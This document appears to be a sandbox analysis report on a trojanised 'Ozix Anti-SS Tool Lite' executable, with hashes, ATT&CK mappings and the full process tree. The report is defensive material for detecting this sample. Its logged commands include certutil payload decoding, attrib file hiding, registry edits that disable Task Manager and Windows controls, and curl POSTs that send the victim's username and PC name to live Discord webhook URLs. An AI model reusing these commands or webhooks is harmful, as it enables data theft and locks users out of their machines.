1a6328b1da373a3e57e714ea983371a60c92c74600bbc78f509548e1272903b5

Analysis

max time kernel
142s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24/08/2024, 20:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Ozix Anti-SS Tool Lite (32 bits) (1).exe
Size

938KB
MD5

f146fc6b0d7f3ad9ff8f14c8c8de6f6c
SHA1

48923c0d8b4d4ce6f4663993d453821ae55e6197
SHA256

1a6328b1da373a3e57e714ea983371a60c92c74600bbc78f509548e1272903b5
SHA512

84f402f35e9daafea7f3bf9cf53c5421210d88981796336d2fc9c56ac80dd6a112325420b7306b00cdb371b9a095ce9307a9064ec00c29401961f6d3a5d9ea8a
SSDEEP

12288:/1IAPjcS1lXlLL8O7NRfNCCZwIMWjXYpoNfSQR2U6iyxBmiKJ1P1Dzx:/SGcS1lXlLL80ZwIvJfR2Ujy81dJ

Score

8^/10

defense_evasion discovery evasion

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1500	attrib.exe
3448	attrib.exe

Deobfuscate/Decode Files or Information 1 TTPs 4 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
212	certutil.exe
2568	cmd.exe
4300	certutil.exe
4964	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	discord.com
9	discord.com
25	discord.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\ You are logged in	cmd.exe
File created	C:\Windows\SysWOW64\ Admin	cmd.exe
File created	C:\Windows\SysWOW64\ _____________________________________________________	cmd.exe
File created	C:\Windows\SysWOW64\ProcessHacker.exe	cmd.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3316	tasklist.exe

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ozix Anti-SS Tool Lite (32 bits) (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mode.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2824	curl.exe
4124	curl.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

T1112

pid	Process
4432	reg.exe
4328	reg.exe
1872	reg.exe
3452	reg.exe
4860	reg.exe
2108	reg.exe
540	reg.exe
4732	reg.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3316	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1908 wrote to memory of 4536	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	85
PID 1908 wrote to memory of 4536	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	85
PID 1908 wrote to memory of 4536	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	85
PID 1908 wrote to memory of 1792	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	86
PID 1908 wrote to memory of 1792	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	86
PID 1908 wrote to memory of 1792	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	86
PID 1908 wrote to memory of 2568	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	87
PID 1908 wrote to memory of 2568	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	87
PID 1908 wrote to memory of 2568	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	87
PID 2568 wrote to memory of 4300	2568	cmd.exe	88
PID 2568 wrote to memory of 4300	2568	cmd.exe	88
PID 2568 wrote to memory of 4300	2568	cmd.exe	88
PID 1908 wrote to memory of 3116	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	89
PID 1908 wrote to memory of 3116	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	89
PID 1908 wrote to memory of 3116	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	89
PID 1908 wrote to memory of 312	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	90
PID 1908 wrote to memory of 312	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	90
PID 1908 wrote to memory of 312	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	90
PID 1908 wrote to memory of 1524	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	91
PID 1908 wrote to memory of 1524	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	91
PID 1908 wrote to memory of 1524	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	91
PID 1908 wrote to memory of 2736	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	92
PID 1908 wrote to memory of 2736	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	92
PID 1908 wrote to memory of 2736	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	92
PID 2736 wrote to memory of 1156	2736	cmd.exe	93
PID 2736 wrote to memory of 1156	2736	cmd.exe	93
PID 2736 wrote to memory of 1156	2736	cmd.exe	93
PID 1908 wrote to memory of 1616	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	94
PID 1908 wrote to memory of 1616	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	94
PID 1908 wrote to memory of 1616	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	94
PID 1616 wrote to memory of 4940	1616	cmd.exe	95
PID 1616 wrote to memory of 4940	1616	cmd.exe	95
PID 1616 wrote to memory of 4940	1616	cmd.exe	95
PID 1908 wrote to memory of 216	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	96
PID 1908 wrote to memory of 216	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	96
PID 1908 wrote to memory of 216	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	96
PID 1908 wrote to memory of 2940	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	97
PID 1908 wrote to memory of 2940	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	97
PID 1908 wrote to memory of 2940	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	97
PID 1908 wrote to memory of 4964	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	98
PID 1908 wrote to memory of 4964	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	98
PID 1908 wrote to memory of 4964	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	98
PID 4964 wrote to memory of 212	4964	cmd.exe	99
PID 4964 wrote to memory of 212	4964	cmd.exe	99
PID 4964 wrote to memory of 212	4964	cmd.exe	99
PID 1908 wrote to memory of 4448	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	100
PID 1908 wrote to memory of 4448	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	100
PID 1908 wrote to memory of 4448	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	100
PID 4448 wrote to memory of 3448	4448	cmd.exe	101
PID 4448 wrote to memory of 3448	4448	cmd.exe	101
PID 4448 wrote to memory of 3448	4448	cmd.exe	101
PID 1908 wrote to memory of 3916	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	102
PID 1908 wrote to memory of 3916	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	102
PID 1908 wrote to memory of 3916	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	102
PID 3916 wrote to memory of 1500	3916	cmd.exe	104
PID 3916 wrote to memory of 1500	3916	cmd.exe	104
PID 3916 wrote to memory of 1500	3916	cmd.exe	104
PID 1908 wrote to memory of 2896	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	105
PID 1908 wrote to memory of 2896	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	105
PID 1908 wrote to memory of 2896	1908	Ozix Anti-SS Tool Lite (32 bits) (1).exe	105
PID 2896 wrote to memory of 2784	2896	cmd.exe	106
PID 2896 wrote to memory of 2784	2896	cmd.exe	106
PID 2896 wrote to memory of 2784	2896	cmd.exe	106
PID 2896 wrote to memory of 5004	2896	cmd.exe	107

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1156	attrib.exe
4940	attrib.exe
3448	attrib.exe
1500	attrib.exe
2060	attrib.exe
916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ozix Anti-SS Tool Lite (32 bits) (1).exe
"C:\Users\Admin\AppData\Local\Temp\Ozix Anti-SS Tool Lite (32 bits) (1).exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\KFICND.dll" "%appdata%\Microsoft\Protect\KFICND.bat" >nul
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\SysWOW64\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.bat"
    3⤵
    - Manipulates Digital Signatures
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:4300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\KFICND.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\attrib.exe
    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll""
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\SysWOW64\attrib.exe
    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll" "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat" >nul
  2⤵
  - Deobfuscate/Decode Files or Information
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\SysWOW64\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat"
    3⤵
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\SysWOW64\attrib.exe
    Attrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat""
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Windows\SysWOW64\attrib.exe
    Attrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll""
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat"
  2⤵
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\mode.com
    mode 83,33
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2784
- - C:\Windows\SysWOW64\reg.exe
    Reg.exe query "HKU\S-1-5-19\Environment"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2536
- - C:\Windows\SysWOW64\curl.exe
    curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**-----------------------------------------------------------------------------------------------**\n*Nuevo Ingreso en Ozix Anti-SS Tool Lite v2.1* (**32 Bits**)\n__**USERNAME**__: Admin\n__**PC Name**__: ODZKDRGV\n__**Session**__: Console\n__**Identifier**__: AMD64 Family 6 Model 13 Stepping 2, AuthenticAMD\n__**Time**__: 20:03:43.32\n**-----------------------------------------------------------------------------------------------**\n\"}" https://discord.com/api/webhooks/1031053923550769213/xKAv5SestPI63JM37-zmpSd8RKLbv11wUssMU-gabSlZYd28aV_89-ECbyd-m7RryghP
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4124
- - C:\Windows\SysWOW64\curl.exe
    curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**-----------------------------------------------------------------------------------------------**\n*Nuevo Ingreso en Ozix Anti-SS Tool Lite v2.1* (**32 Bits**)\n__**USERNAME**__: Admin\n__**PC Name**__: ODZKDRGV\n__**Session**__: Console\n__**Identifier**__: AMD64 Family 6 Model 13 Stepping 2, AuthenticAMD\n__**Time**__: 20:03:44.48\n**-----------------------------------------------------------------------------------------------**\n\"}" https://discord.com/api/webhooks/1031010612379127858/Q5wjGCNup4XFH9V7EC2pdmSBWWOa7uRozKfMmDnnKX9Qr792SZtMpunaW9GHhM3FwHyQ
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2824
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:04 /R "^$" " You are logged in " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2980
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:C /R "^$" " Admin " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2348
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4368
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1600
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:04 /R "^$" " You are logged in " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3628
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:C /R "^$" " Admin " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1084
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:864
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5020
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:04 /R "^$" " You are logged in " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4332
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:C /R "^$" " Admin " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4236
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1964
- - C:\Windows\SysWOW64\findstr.exe
    findstr /v /a:F /R "^$" " _____________________________________________________ " nul
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4328
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1872
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:3452
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:540
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4732
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3316
- - C:\Windows\SysWOW64\find.exe
    find /I "ProcessHacker.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4352
- - C:\Windows\SysWOW64\attrib.exe
    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll""
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat"" >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4316
- - C:\Windows\SysWOW64\attrib.exe
    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.dll") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\Ozix Anti-SS Tool Lite.bat") >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Process Discovery

T1057

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

